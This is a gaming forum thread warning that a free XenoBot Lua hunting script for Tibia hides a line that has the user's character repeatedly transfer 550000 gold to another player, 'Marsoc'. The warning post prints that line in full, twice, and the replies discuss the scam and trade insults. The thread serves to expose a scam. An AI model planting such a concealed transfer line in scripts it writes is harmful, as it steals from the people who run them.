• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!

Be careful for "Ljecim Crew" & his promo script...

Boomz

Reaction score
BE CAREFUL... HE SHOULD BE BANNED !

I was thinking about why would he sell scripts & giving to everyone a promo script, there can be just something wrong. Then I tought about the script might transfer your cash to his character. Since I'm advanced scripter in XenoBot I tought about checking the script to warn other people.

I was just right.... thats what I found in "hive2.lua" on line 643...

Code:
Self.SayToNpc({"hi", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes"}, 65)

xg7aow.jpg

@Mark & @Hani... please ban this guy and safe other people from loosing their cash.

Thanks!

Last edited:
fake dude Xd I have 2 script from hexonik and all is working ;c

I can confirm that the line exists in the script. I guess there are no official rules against this, so not sure if the staff will do anything. You shouldn't run scripts from people without a reputation. And when it comes to xenobot, ask for their username on xenobot forums as I am sure Darkstar will ban scammers there, effectively making them lose their xenobot access.

The script is so poorly coded as well.

I can confirm that the line exists in the script. I guess there are no official rules against this, so not sure if the staff will do anything. You shouldn't run scripts from people without a reputation. And when it comes to xenobot, ask for their username on xenobot forums as I am sure Darkstar will ban scammers there, effectively making them lose their xenobot access.

There rule doesn't exist, but hacking is forbidden and it's nearly the same. He steals other ppl's cash, same he would do when he logs on his acc. Also it's bad enough he is advertising over the whole server it.
Nobody cares how bad the script is coded, the transfer function works and that is what matters. :)

i know the person who created the character Ljecim Crew and someone hack him so its normally the script its only for his profit. There isnt to much people who give perfect safe script free =)

i know the person who created the character Ljecim Crew and someone hack him so its normally the script its only for his profit. There isnt to much people who give perfect safe script free =)

If it's not the real owner and he is hacked, then it's one mor reason to ban him. :)

Its crack im sure at 97%

The waypoints don't even have half the labels mentioned in the script. Could be that it's an edit of someone elses script. Doesn't really matter.

thx for deleting my post..
abaut script, this 550k is payment for afk hunting xD , dont wanna use it? don't download and dont use and since its not any hack link etc there is no reason to ban
thx

@up
meaby you dont have half of your brain? all labels working great, test this bro :D

Last edited:
BE CAREFUL... HE SHOULD BE BANNED !

I was thinking about why would he sell scripts & giving to everyone a promo script, there can be just something wrong. Then I tought about the script might transfer your cash to his character. Since I'm advanced scripter in XenoBot I tought about checking the script to warn other people.

I was just right.... thats what I found in "hive2.lua" on line 643...

Code:
Self.SayToNpc({"hi", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes", "transfer 550000", "Marsoc", "yes"}, 65)

xg7aow.jpg

@Mark & @Hani... please ban this guy and safe other people from loosing their cash.

Thanks!
"Advanced xenobot scripter" wow, much hard to open a .lua file and ctrl + f and write "transfer", wow much advanced gz

abaut script, this 550k is payment for afk hunting xD , dont wanna use it? don't download and dont use and since its not any hack link etc there is no reason to ban
thx

@up
meaby you dont have half of your brain? all labels working great, test this bro :D

Dont make a fool of us bastard

thx

@up
elo are u ljecim crew bro? jajaja i didnt know it >.<

Back
Top Bottom